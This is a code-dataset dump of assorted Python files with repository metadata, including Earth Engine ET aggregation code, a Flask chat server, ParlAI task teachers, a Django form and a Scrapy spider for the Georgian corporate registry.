        interp_method=interp_method, interp_days=interp_days,
        use_joins=use_joins,
        compute_product=True,
    )
    # The interpolate.daily() function is currently returning the product of
    # the source and target image named as "{source_band}_1".
    # This approach will not be valid if other bands are interpolated.
    daily_coll = daily_coll.select(['et_norm_1'], ['et'])
    # Convert normalized ET back to ET
    # This isn't needed if compute_product=True in daily() and band is renamed
    # The check for et_fraction is needed since it is back computed from ET and ETr
    # # if 'et' in variables or 'et_fraction' in variables:
    # def compute_et(img):
    #     """This function assumes ETr and ETf are present"""
    #     et_img = img.select(['et_norm']).multiply(
    #         img.select(['et_reference']))
    #     return img.addBands(et_img.double().rename('et'))
    # daily_coll = daily_coll.map(compute_et)
    def aggregate_image(agg_start_date, agg_end_date, date_format):
        """Aggregate the daily images within the target date range
        Parameters
        ----------
        agg_start_date: ee.Date, str
            Start date (inclusive).
        agg_end_date : ee.Date, str
            End date (exclusive).
        date_format : str
            Date format for system:index (uses EE JODA format).
        Returns
        -------
        ee.Image
        Notes
        -----
        Since this function takes multiple inputs it is being called
        for each time interval by separate mappable functions
        """
        if 'et' in variables or 'et_fraction' in variables:
            et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
                .select(['et']).sum()
        if 'et_reference' in variables or 'et_fraction' in variables:
            # Get the reference ET image from the reference ET collection,
            # not the interpolated collection
            # et_reference_img = daily_coll.select(['et_reference']) \
            et_reference_img = daily_et_ref_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .sum()
        image_list = []
        if 'et' in variables:
            image_list.append(et_img.float())
        if 'et_reference' in variables:
            image_list.append(et_reference_img.float())
        if 'et_fraction' in variables:
            # Compute average et fraction over the aggregation period
            image_list.append(
                et_img.divide(et_reference_img)
                    .rename(['et_fraction']).float())
        # if 'ndvi' in variables:
        #     # Compute average ndvi over the aggregation period
        #     ndvi_img = daily_coll \
        #         .filterDate(agg_start_date, agg_end_date) \
        #         .mean().select(['ndvi']).float()
        #     image_list.append(ndvi_img)
        if 'count' in variables:
            count_img = aggregate_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .select(['mask']).sum().rename('count').uint8()
            image_list.append(count_img)
        return ee.Image(image_list) \
            .set({
                'system:index': ee.Date(agg_start_date).format(date_format),
                'system:time_start': ee.Date(agg_start_date).millis()})
        #     .set(interp_properties)\
    # Combine input, interpolated, and derived values
    if t_interval.lower() == 'daily':
        def agg_daily(daily_img):
            # CGM - Double check that this time_start is a 0 UTC time.
            # It should be since it is coming from the interpolate source
            # collection, but what if source is GRIDMET (+6 UTC)?
            agg_start_date = ee.Date(daily_img.get('system:time_start'))
            # CGM - This calls .sum() on collections with only one image
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'day'),
                date_format='YYYYMMdd')
        return ee.ImageCollection(daily_coll.map(agg_daily))
    elif t_interval.lower() == 'monthly':
        def month_gen(iter_start_dt, iter_end_dt):
            # Yield the first day of each month in the range (client side)
            iter_dt = iter_start_dt
            # Conditional is "less than" because end date is exclusive
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(months=+1)
        month_list = ee.List(list(month_gen(start_dt, end_dt)))
        def agg_monthly(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'month'),
                date_format='YYYYMM')
        return ee.ImageCollection(month_list.map(agg_monthly))
    elif t_interval.lower() == 'annual':
        def year_gen(iter_start_dt, iter_end_dt):
            # Yield the first day of each year in the range (client side)
            iter_dt = iter_start_dt
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(years=+1)
        year_list = ee.List(list(year_gen(start_dt, end_dt)))
        def agg_annual(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'year'),
                date_format='YYYY')
        return ee.ImageCollection(year_list.map(agg_annual))
    elif t_interval.lower() == 'custom':
        # Returning an ImageCollection to be consistent
        return ee.ImageCollection(aggregate_image(
            agg_start_date=start_date, agg_end_date=end_date,
            date_format='YYYYMMdd'))
# @deprecated
# def aggregate_daily_with_joins(image_coll, start_date, end_date,
# agg_type='mean'):
# """Aggregate images by day (using joins)
#
# The primary purpose of this function is to join separate Landsat images
# from the same path into a single daily image.
#
# Parameters
# ----------
# image_coll : ee.ImageCollection
# Input image collection.
# start_date : date, number, string
# Start date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# end_date : date, number, string
# End date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# agg_type : {'mean'}, optional
# Aggregation type (the default is 'mean').
# Currently only a 'mean' aggregation type is supported.
#
# Returns
# -------
# ee.ImageCollection()
#
# Notes
# -----
# This function should be used to mosaic Landsat images from same path
# but different rows.
# system:time_start of returned images will be 0 UTC (not the image time).
#
# """
# # Build a collection of time "features" to join to
# # "Flatten" dates to 0 UTC time
# if start_date and end_date:
# date_list = ee.List.sequence(
# ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# 24 * 3600 * 1000)
# # elif start_date:
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # end_date = ee.Date.fromYMD(end_date.get('year'), end_date.get('month'),
# # # end_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), end_date.millis(), 24 * 3600 * 1000)
# # elif end_date:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # start_date = ee.Date.fromYMD(
# # # start_date.get('year'), start_date.get('month'),
# # # start_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # start_date.millis(), ee.Date(end_date).millis(), 24 * 3600 * 1000)
# # else:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# # 24 * 3600 * 1000)
#
# def set_date(time):
# return ee.Feature(None, {
# 'system:index': ee.Date(time).format('yyyyMMdd'),
# 'system:time_start': ee.Number(time).int64(),
# 'date': ee.Date(time).format('yyyy-MM-dd')})
#
# # Add a date property to the image collection
# def set_image_date(img):
# return ee.Image(img.set({
# 'date': ee.Date(img.get('system:time_start')).format('yyyy-MM-dd')}))
#
# join_coll = ee.FeatureCollection(
# ee.Join.saveAll('join').apply(
# ee.FeatureCollection(date_list.map(set_date)),
# ee.ImageCollection(image_coll.map(set_image_date)),
# ee.Filter.equals(leftField='date', rightField='date')))
#
# def aggregate_func(ftr):
# # The composite image time will be 0 UTC (not Landsat time)
# agg_coll = ee.ImageCollection.fromImages(ftr.get('join'))
#
# # if agg_type.lower() == 'mean':
# agg_img = agg_coll.mean()
# # elif agg_type.lower() == 'median':
# # agg_img = agg_coll.median()
#
# return agg_img.set({
# 'system:index': ftr.get('system:index'),
# 'system:time_start': ftr.get('system:time_start'),
# 'date': ftr.get('date'),
# })
#
# return ee.ImageCollection(join_coll.map(aggregate_func))
| 5,374 | 0 | 443 |
d647d9fc435832b4a77f277be087b6f1b5bcaf8b | 118 | py | Python | Stepin_Roman/lesson_2/DZ_1.1.py | StepinRomanSerg/1824_GB_Python_1 | 0657b4d03e0ce73ddbb100ee12da5508820caeea | [
"MIT"
] | null | null | null | Stepin_Roman/lesson_2/DZ_1.1.py | StepinRomanSerg/1824_GB_Python_1 | 0657b4d03e0ce73ddbb100ee12da5508820caeea | [
"MIT"
] | null | null | null | Stepin_Roman/lesson_2/DZ_1.1.py | StepinRomanSerg/1824_GB_Python_1 | 0657b4d03e0ce73ddbb100ee12da5508820caeea | [
"MIT"
] | null | null | null | a = 15 * 3
# Exercise the basic arithmetic operators and inspect the result types.
a = 15 * 3   # multiplication of ints -> int
b = 15 / 3   # true division always yields float
c = 15 // 2  # floor division of ints -> int
d = 15 ** 2  # exponentiation -> int
print(type(a), a)
print(type(b), b)
print(type(c), c)  # fixed: previously printed `b` with type(c)
print(type(d), d)
| 13.111111 | 17 | 0.508475 | a = 15 * 3
# Exercise the basic arithmetic operators and inspect the result types.
a = 15 * 3   # multiplication of ints -> int
b = 15 / 3   # true division always yields float
c = 15 // 2  # floor division of ints -> int
d = 15 ** 2  # exponentiation -> int
print(type(a), a)
print(type(b), b)
print(type(c), c)  # fixed: previously printed `b` with type(c)
print(type(d), d)
| 0 | 0 | 0 |
57c553a9a739ecbb0b4fd2427d2bac62b228e5ff | 599 | py | Python | Python/WebChat/main.py | MariaMich/Hacktoberfest2019-2 | a1a1756fa4594ab9965405e0361a5125b1d4dd48 | [
"MIT"
] | null | null | null | Python/WebChat/main.py | MariaMich/Hacktoberfest2019-2 | a1a1756fa4594ab9965405e0361a5125b1d4dd48 | [
"MIT"
] | null | null | null | Python/WebChat/main.py | MariaMich/Hacktoberfest2019-2 | a1a1756fa4594ab9965405e0361a5125b1d4dd48 | [
"MIT"
] | null | null | null | #! /usr/bin/python
# -*- encoding: utf-8 -*-
from flask import Flask, render_template, jsonify
from flask_socketio import SocketIO, emit
app = Flask(__name__, template_folder='templates', static_url_path='/static/', static_folder='static')
app.config['SECRET_KEY'] = 'ines'
socketio = SocketIO(app)
@app.route('/')
@socketio.on('connected')
@socketio.on('client_message')
if __name__ == '__main__':
socketio.run(app, debug=True)
| 23.96 | 102 | 0.722871 | #! /usr/bin/python
# -*- encoding: utf-8 -*-
from flask import Flask, render_template, jsonify
from flask_socketio import SocketIO, emit
app = Flask(__name__, template_folder='templates', static_url_path='/static/', static_folder='static')
app.config['SECRET_KEY'] = 'ines'
socketio = SocketIO(app)
@app.route('/')
def index():
return render_template('./index.html')
@socketio.on('connected')
def conn(msg):
return {'data':'Ok'}
@socketio.on('client_message')
def receive_message(data):
emit('server_message', data, broadcast=True)
if __name__ == '__main__':
socketio.run(app, debug=True)
| 97 | 0 | 66 |
b27d9d10ebfcf46ce082cb1400705ed810b5c508 | 1,309 | py | Python | plugin/functions.py | jfcherng/Sublime-Fanhuaji | 85c13d0e44fe8d55de3a2f1fcd7382aead6767a2 | [
"MIT"
] | null | null | null | plugin/functions.py | jfcherng/Sublime-Fanhuaji | 85c13d0e44fe8d55de3a2f1fcd7382aead6767a2 | [
"MIT"
] | null | null | null | plugin/functions.py | jfcherng/Sublime-Fanhuaji | 85c13d0e44fe8d55de3a2f1fcd7382aead6767a2 | [
"MIT"
] | null | null | null | from .constant import TEXT_DELIMITER
from .settings import get_setting
from typing import Any, Dict, Optional
import sublime
| 35.378378 | 111 | 0.674561 | from .constant import TEXT_DELIMITER
from .settings import get_setting
from typing import Any, Dict, Optional
import sublime
def prepare_fanhuaji_convert_args(view: sublime.View, args: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
_args: Dict[str, Any] = get_setting("convert_params")
# 轉換模組
if "modules" in _args and isinstance(_args["modules"], dict):
_args["modules"] = sublime.encode_value(_args["modules"])
# 轉換前取代
if "userPreReplace" in _args and isinstance(_args["userPreReplace"], dict):
_args["userPreReplace"] = "\n".join(f"{old}={new}" for old, new in _args["userPreReplace"].items())
# 轉換後取代
if "userPostReplace" in _args and isinstance(_args["userPostReplace"], dict):
_args["userPostReplace"] = "\n".join(f"{old}={new}" for old, new in _args["userPostReplace"].items())
# 保護字詞
if "userProtectReplace" in _args and isinstance(_args["userProtectReplace"], list):
_args["userProtectReplace"] = "\n".join(_args["userProtectReplace"])
# 參數: API 全域
_args["apiKey"] = get_setting("api_key")
_args["prettify"] = False
# 參數: API convert 端點
_args["text"] = TEXT_DELIMITER.join(view.substr(region) for region in view.sel())
_args["diffEnable"] = False
_args.update(args or {})
return _args
| 1,216 | 0 | 23 |
a3f069b53d411bc2f04b599eaa7ce34537700ad7 | 1,762 | py | Python | parlai/tasks/cbt/agents.py | cherie11/ParlAI | 1c1e4b00b398278b652c24ed5cac072cff6a9c9a | [
"MIT"
] | 258 | 2020-04-10T07:01:06.000Z | 2022-03-26T11:49:30.000Z | parlai/tasks/cbt/agents.py | cherie11/ParlAI | 1c1e4b00b398278b652c24ed5cac072cff6a9c9a | [
"MIT"
] | 33 | 2020-04-10T04:28:51.000Z | 2022-03-31T02:52:02.000Z | parlai/tasks/cbt/agents.py | cherie11/ParlAI | 1c1e4b00b398278b652c24ed5cac072cff6a9c9a | [
"MIT"
] | 43 | 2020-04-14T10:43:33.000Z | 2022-03-13T02:27:54.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import FbDialogTeacher
from parlai.core.agents import MultiTaskTeacher
from .build import build
import copy
import os
# By default train on all tasks at once.
| 27.107692 | 79 | 0.628831 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import FbDialogTeacher
from parlai.core.agents import MultiTaskTeacher
from .build import build
import copy
import os
def _path(task, opt):
# Build the data if it doesn't exist.
build(opt)
suffix = ''
dt = opt['datatype'].split(':')[0]
if dt == 'train':
suffix = 'train'
elif dt == 'test':
suffix = 'test_2500ex'
elif dt == 'valid':
suffix = 'valid_2000ex'
return os.path.join(
opt['datapath'], 'CBT', 'CBTest', 'data', task + '_' + suffix + '.txt')
class NETeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_NE', opt)
opt['cloze'] = True
super().__init__(opt, shared)
class CNTeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_CN', opt)
opt['cloze'] = True
super().__init__(opt, shared)
class VTeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_V', opt)
opt['cloze'] = True
super().__init__(opt, shared)
class PTeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_P', opt)
opt['cloze'] = True
super().__init__(opt, shared)
# By default train on all tasks at once.
class DefaultTeacher(MultiTaskTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
opt['task'] = 'cbt:NE,cbt:CN,cbt:V,cbt:P'
super().__init__(opt, shared)
| 1,038 | 64 | 267 |
4b95b9ac7e0519a13cf1fee5ad8da8e76d71d11a | 431 | py | Python | Generators.py | m10singh94/Python-programs | a83083044b4a85afcf70c4b7024287a808b01fee | [
"Apache-2.0"
] | null | null | null | Generators.py | m10singh94/Python-programs | a83083044b4a85afcf70c4b7024287a808b01fee | [
"Apache-2.0"
] | null | null | null | Generators.py | m10singh94/Python-programs | a83083044b4a85afcf70c4b7024287a808b01fee | [
"Apache-2.0"
] | null | null | null | import random
#1
for number in gensquares(10):
print(number)
print('\n')
#2
for number in rand_num(1,10,12):
print(number)
print('\n')
#3
s = 'hello'
s_iter = iter(s)
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter)) | 16.576923 | 38 | 0.645012 | import random
#1
def gensquares(n):
for x in range(n):
yield x**2
for number in gensquares(10):
print(number)
print('\n')
#2
def rand_num(low, high, n):
for i in range(0,n):
yield random.randint(low,high)
for number in rand_num(1,10,12):
print(number)
print('\n')
#3
s = 'hello'
s_iter = iter(s)
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter)) | 109 | 0 | 44 |
3b3455757da385a4f765daef6d697e12b221bf80 | 975 | py | Python | employee_portal/view_employee_information/forms.py | Dmitriy200123/employee_portal | e06c2cfc03a5d046d5846186249c2140e7ba7814 | [
"MIT"
] | null | null | null | employee_portal/view_employee_information/forms.py | Dmitriy200123/employee_portal | e06c2cfc03a5d046d5846186249c2140e7ba7814 | [
"MIT"
] | null | null | null | employee_portal/view_employee_information/forms.py | Dmitriy200123/employee_portal | e06c2cfc03a5d046d5846186249c2140e7ba7814 | [
"MIT"
] | 1 | 2021-07-28T14:48:40.000Z | 2021-07-28T14:48:40.000Z | from django import forms
from django.forms import ModelForm
from employee_information_site.models import CompanyDepartment, EmployeePosition, Employee
| 46.428571 | 108 | 0.641026 | from django import forms
from django.forms import ModelForm
from employee_information_site.models import CompanyDepartment, EmployeePosition, Employee
class FilterForm(ModelForm):
def __init__(self, *args, **kwargs):
super(FilterForm, self).__init__(*args, **kwargs)
self.fields['department'].empty_label = 'Выберите отдел'
self.fields['position'].empty_label = 'Выберите должность'
department = forms.ModelChoiceField(CompanyDepartment.objects, required=False,
widget=forms.Select(attrs={'class': 'search_parameter department'}))
position = forms.ModelChoiceField(EmployeePosition.objects, required=False,
widget=forms.Select(choices=EmployeePosition.objects.all(),
attrs={'class': 'search_parameter position'}))
class Meta:
model = Employee
fields = ['department', 'position']
| 235 | 595 | 23 |
f68c9af4edf24f6038b2dc6406e316c94a3d6b34 | 1,467 | py | Python | sandbox/test_abort.py | gwiederhecker/MPh | d5eb7b6e9e00fe3fcd00acf53278a89243ae512a | [
"MIT"
] | 1 | 2021-12-23T09:15:56.000Z | 2021-12-23T09:15:56.000Z | sandbox/test_abort.py | gwiederhecker/MPh | d5eb7b6e9e00fe3fcd00acf53278a89243ae512a | [
"MIT"
] | null | null | null | sandbox/test_abort.py | gwiederhecker/MPh | d5eb7b6e9e00fe3fcd00acf53278a89243ae512a | [
"MIT"
] | null | null | null | """
Tests if `KeyboardInterrupt` exception are properly handled.
This test currently fails. That is, trying to interrupt an ongoing
operation of the Comsol client crashes out of the Python session
instead of allowing further code execution or a return to the
interactive prompt.
The script does not depend on MPh, but starts the Comsol client
directly via the Java bridge JPype. Paths to the Comsol installation
are hard-coded for a Windows installation of Comsol 5.6. Other versions
or install locations can be tested by editing the assignment to the
`root` variable. On Linux, 'win64' has to be replaced by 'glnxa64',
and on macOS by 'maci64'.
"""
import jpype
import jpype.imports
from time import sleep
from timeit import default_timer as now
from pathlib import Path
print(f'Starting Comsol\'s Java VM via JPype {jpype.__version__}.')
root = Path(r'C:\Program Files\COMSOL\COMSOL56\Multiphysics')
jvm = root/'java'/'win64'/'jre'/'bin'/'server'/'jvm.dll'
jpype.startJVM(str(jvm), classpath=str(root/'plugins'/'*'), interrupt=False)
print('Starting stand-alone Comsol client.')
from com.comsol.model.util import ModelUtil as client
client.initStandalone(False)
client.loadPreferences()
print('Press Ctrl+C within the next 10 seconds.')
t0 = now()
try:
sleep(10)
except KeyboardInterrupt:
pass
finally:
if now() - t0 < 9.9:
print('Test passed.')
else:
print('Sleep timer expired.')
| 33.340909 | 77 | 0.728698 | """
Tests if `KeyboardInterrupt` exception are properly handled.
This test currently fails. That is, trying to interrupt an ongoing
operation of the Comsol client crashes out of the Python session
instead of allowing further code execution or a return to the
interactive prompt.
The script does not depend on MPh, but starts the Comsol client
directly via the Java bridge JPype. Paths to the Comsol installation
are hard-coded for a Windows installation of Comsol 5.6. Other versions
or install locations can be tested by editing the assignment to the
`root` variable. On Linux, 'win64' has to be replaced by 'glnxa64',
and on macOS by 'maci64'.
"""
import jpype
import jpype.imports
from time import sleep
from timeit import default_timer as now
from pathlib import Path
print(f'Starting Comsol\'s Java VM via JPype {jpype.__version__}.')
root = Path(r'C:\Program Files\COMSOL\COMSOL56\Multiphysics')
jvm = root/'java'/'win64'/'jre'/'bin'/'server'/'jvm.dll'
jpype.startJVM(str(jvm), classpath=str(root/'plugins'/'*'), interrupt=False)
print('Starting stand-alone Comsol client.')
from com.comsol.model.util import ModelUtil as client
client.initStandalone(False)
client.loadPreferences()
print('Press Ctrl+C within the next 10 seconds.')
t0 = now()
try:
sleep(10)
except KeyboardInterrupt:
pass
finally:
if now() - t0 < 9.9:
print('Test passed.')
else:
print('Sleep timer expired.')
| 0 | 0 | 0 |
daf513fbe709d0f310a608eb9a54407a037600eb | 1,112 | py | Python | modules/dazzle/src/main/jython/exec_test_setup.py | drichan/xito | 811f29e8ecda8072ce2a0eb4373ec16f6b083c99 | [
"Apache-2.0"
] | null | null | null | modules/dazzle/src/main/jython/exec_test_setup.py | drichan/xito | 811f29e8ecda8072ce2a0eb4373ec16f6b083c99 | [
"Apache-2.0"
] | null | null | null | modules/dazzle/src/main/jython/exec_test_setup.py | drichan/xito | 811f29e8ecda8072ce2a0eb4373ec16f6b083c99 | [
"Apache-2.0"
] | 1 | 2018-10-19T07:49:02.000Z | 2018-10-19T07:49:02.000Z | import shutil
import java.lang.System
print "Setup exec_test using exec_test_setup.py"
#System Properties
user_home = java.lang.System.getProperty("user.home")
base_dir = java.lang.System.getProperty("basedir")
project_version = java.lang.System.getProperty("project.version")
artifactId = java.lang.System.getProperty("artifactId")
print("use_home=" + user_home)
print("base_dir=" + base_dir)
print("project_version=" + project_version)
print("artifactId=" + artifactId)
shutil.rmtree(base_dir + "/target/exec_test", ignore_errors=True)
shutil.copytree(base_dir + "/resources/exec_test", base_dir + "/target/exec_test")
shutil.copytree(base_dir + "/resources/" + artifactId, base_dir + "/target/exec_test/" + artifactId)
boot_jar_src = user_home +"/.m2/repository/org/xito/bootstrap/" + project_version + "/bootstrap-" + project_version + ".jar"
print "boot jar=" + boot_jar_src
shutil.copyfile(boot_jar_src, base_dir + "/target/exec_test/boot.jar")
test_jar = artifactId + "-" + project_version + "-tests.jar"
shutil.copyfile(base_dir + "/target/" + test_jar, base_dir + "/target/exec_test/" + test_jar)
| 41.185185 | 124 | 0.756295 | import shutil
import java.lang.System
print "Setup exec_test using exec_test_setup.py"
#System Properties
user_home = java.lang.System.getProperty("user.home")
base_dir = java.lang.System.getProperty("basedir")
project_version = java.lang.System.getProperty("project.version")
artifactId = java.lang.System.getProperty("artifactId")
print("use_home=" + user_home)
print("base_dir=" + base_dir)
print("project_version=" + project_version)
print("artifactId=" + artifactId)
shutil.rmtree(base_dir + "/target/exec_test", ignore_errors=True)
shutil.copytree(base_dir + "/resources/exec_test", base_dir + "/target/exec_test")
shutil.copytree(base_dir + "/resources/" + artifactId, base_dir + "/target/exec_test/" + artifactId)
boot_jar_src = user_home +"/.m2/repository/org/xito/bootstrap/" + project_version + "/bootstrap-" + project_version + ".jar"
print "boot jar=" + boot_jar_src
shutil.copyfile(boot_jar_src, base_dir + "/target/exec_test/boot.jar")
test_jar = artifactId + "-" + project_version + "-tests.jar"
shutil.copyfile(base_dir + "/target/" + test_jar, base_dir + "/target/exec_test/" + test_jar)
| 0 | 0 | 0 |
18b99e8cb5a22dc82d72bb7f1aca63ac9a0ca873 | 183 | py | Python | sololearn/FlowingWords/FlowingWords.py | SneakyWizards/HackerRankSolutions | daf494e7775bb0de5afcfdcfd45aa73e6a950e0e | [
"RSA-MD"
] | 3 | 2020-01-08T18:33:11.000Z | 2022-02-08T00:38:26.000Z | sololearn/FlowingWords/FlowingWords.py | SneakyWizards/HackerRankSolutions | daf494e7775bb0de5afcfdcfd45aa73e6a950e0e | [
"RSA-MD"
] | null | null | null | sololearn/FlowingWords/FlowingWords.py | SneakyWizards/HackerRankSolutions | daf494e7775bb0de5afcfdcfd45aa73e6a950e0e | [
"RSA-MD"
] | 4 | 2020-08-08T22:02:23.000Z | 2022-02-07T17:40:15.000Z | #!/usr/bin/python
in_str = str(input()).lower().split()
for i in range(1, len(in_str)):
if in_str[i-1][-1] != in_str[i][0]:
print("false")
exit(0)
print("true") | 18.3 | 39 | 0.546448 | #!/usr/bin/python
in_str = str(input()).lower().split()
for i in range(1, len(in_str)):
if in_str[i-1][-1] != in_str[i][0]:
print("false")
exit(0)
print("true") | 0 | 0 | 0 |
c17f59bdcdb9876af0c29a577cc8884e6cd3bfe3 | 31,676 | py | Python | registry/spiders/CorporationSpider.py | openc/GeorgiaCorporationScraper | 2bccab5ef2f00507128bc3dc299d5c27c3b39b97 | [
"MIT"
] | 1 | 2017-07-30T21:50:22.000Z | 2017-07-30T21:50:22.000Z | registry/spiders/CorporationSpider.py | openc/GeorgiaCorporationScraper | 2bccab5ef2f00507128bc3dc299d5c27c3b39b97 | [
"MIT"
] | null | null | null | registry/spiders/CorporationSpider.py | openc/GeorgiaCorporationScraper | 2bccab5ef2f00507128bc3dc299d5c27c3b39b97 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import math
import urlparse
from scrapy.spider import BaseSpider
from scrapy.http import Request, FormRequest
from scrapy.selector import HtmlXPathSelector
from scrapy import log
from bs4 import BeautifulSoup
from registry.items import Corporation, Person, CorporationDocument, StatementDocument, RegistryStatement, PersonCorpRelation, RegistryExtract
from registry import pdfparse
| 46.857988 | 157 | 0.555057 | # -*- coding: utf-8 -*-
import re
import math
import urlparse
from scrapy.spider import BaseSpider
from scrapy.http import Request, FormRequest
from scrapy.selector import HtmlXPathSelector
from scrapy import log
from bs4 import BeautifulSoup
from registry.items import Corporation, Person, CorporationDocument, StatementDocument, RegistryStatement, PersonCorpRelation, RegistryExtract
from registry import pdfparse
class CorporationSpider(BaseSpider):
    """Spider for the Georgian corporate registry at enreg.reestri.gov.ge.

    Searches the registry once per hard-coded legal-entity form code,
    walks the paginated result tables, and scrapes corporation detail
    pages, statements and attached documents into the items defined in
    ``registry.items``.
    """
    name = "corps"
    page_by_page = True # Scrape page-by-page -- pretty slow (~40 hours)
                        # Guess db ids, MUCH faster for individual IDs,
                        # But the IDs aren't contiguous enough for this
                        # to be useful; there are ~500K corporations
                        # but ~10M IDs. Currently overruns memory.
    #allowed_domains = ["enreg.reestri.gov.ge"]
    # Single PHP entry point; every search / detail view is reached via
    # query-string or form parameters against this URL.
    base_url = "https://enreg.reestri.gov.ge/main.php"
    start_urls = [base_url]
    #MAX_CONSEC_MISSES = 100
# Override so that we can set our cookie easily.
def start_requests(self):
#log.msg("in start_requests")
# Scraping the search dropdown menu is incomplete
# Scraping with all results is difficult (can't get it to work),
# slow (~5.5s per results page), and includes Individual Entrepreneurs,
# which aren't very interesting. So, I'm hardcoding a list of corp
# types which will be searched. TODO: Allow list to be determined
# at runtime.
# results can also be found in 1 and 16, but both appear
# to be just individuals, without any other helpful info.
corp_forms = [2,3,4,5,6,7,8,9,10,11,12,13,15,17,
22,23,24,25,26,27,28,29,99,100]
results = []
for form in corp_forms:
request = Request(self.base_url,
callback=self.setup_cookies,
dont_filter=True,
meta={'cookiejar': str(form),
'corp_class': str(form),})
results.append(request)
return results
# This site does some incredibly stupid things with cookies
# so we need to use a separate cookie jar for each type of
# corporation that we will scrape.
def setup_cookies(self, response):
form_data ={'c': 'search',
'm': 'find_legal_persons',
's_legal_person_idnumber':'',
's_legal_person_name':''}
form_data['s_legal_person_form'] = response.meta['cookiejar']
if 'renew' in response.meta:
request = FormRequest(self.base_url,
dont_filter=True,
formdata=form_data,
callback=self.parse_corpresults,
meta={'cookiejar': response.meta['cookiejar'],
'renew': response.meta['renew'],
'total': response.meta['total'],
'page': response.meta['page'],})
else:
request = FormRequest(self.base_url,
formdata=form_data,
callback=self.parse_corpresults,
meta={'cookiejar': response.meta['cookiejar']})
yield request
# Finds out how many pages of results there are and launches
# requests for them.
def parse_corpresults(self, response):
# The total number of records is listed at the bottom of the table
# Divide by 5 records per page to get the total number of pages
# we need to scrape.
RESULTS_PER_PAGE = 5
form_data ={'c': 'search',
'm': 'find_legal_persons',
}
# The site does some dumb things with session variables, sometimes
# they need to get renewed.
if 'renew' in response.meta:
form_data['p'] = response.meta['page']
request = FormRequest(self.base_url,
dont_filter=True,
formdata=form_data,
callback=self.parse_corptable,
meta={'cookiejar': response.meta['cookiejar'],
'total': response.meta['total'],
'page': response.meta['page'],
'type': response.meta['cookiejar'],
})
yield request
# Otherwise, this is our first time viewing this result type, and
# we start from the beginning.
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
cells = soup.find_all("td")
td = None
# The number of results is in a <td> that contains the text
# სულ.
# After that, there is a <strong> tag that has the actual number
# in it, and then some other stuff. So we search through all
# the td tags until we find the one with matching text,
# and then grab the number in its <strong> tag.
regx = re.compile(u"^\s+სულ\s+$")
for cell in cells:
if (regx.match(cell.contents[0])):
td = cell #Found the right cell!
break;
total_results = float(td.find("strong").string)
total_pages = int(math.ceil(total_results/RESULTS_PER_PAGE))
#log.msg("Total pages: {}".format(str(total_pages)))
log.msg("Total results: {}".format(str(total_results)))
# Scrapy generally tends to scrape last page first,
# so reverse the order we return the results so that
# earlier pages are scraped earlier and easier to manually
# debug in a browser.
#for pg in reversed(range(1,total_pages+1)):
start_page = 1
for pg in reversed(range(1,total_pages+1)):
form_data["p"]=str(pg)
request = FormRequest(self.base_url,
formdata=form_data,
dont_filter=True,
callback=self.parse_corptable,
meta={'cookiejar': response.meta['cookiejar'],
'page': pg,
'total': total_pages,
'type': response.meta['cookiejar'],
})
yield request
#form_data["p"]=str(start_page)
#request = FormRequest(self.base_url,
# dont_filter=True,
# formdata=form_data,
# callback=self.parse_corptable,
# meta={'cookiejar': response.meta['cookiejar'],
# 'page': start_page,
# 'total': total_pages,
# 'type': response.meta['cookiejar'],
# })
#yield request
# Parses the table on the search results page in order to
# get links to individual corporation detail pages.
def parse_corptable(self, response):
# The database IDs of each corporation are located
# in onclick() events on <a> tags surrounding info
# button images. So we get the info images, and then
# extract the db id from their parents.
#log.msg("Parsing corp results table")
log.msg("Parsing page {}/{} of type {}".format(response.meta['page'],response.meta['total'],response.meta['type']))
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
buttons = soup.find_all("img",src="https://enreg.reestri.gov.ge/images/info.png")
results = []
for b in buttons:
dbid = b.parent['onclick'].split(u"(")[-1].rstrip(u")")
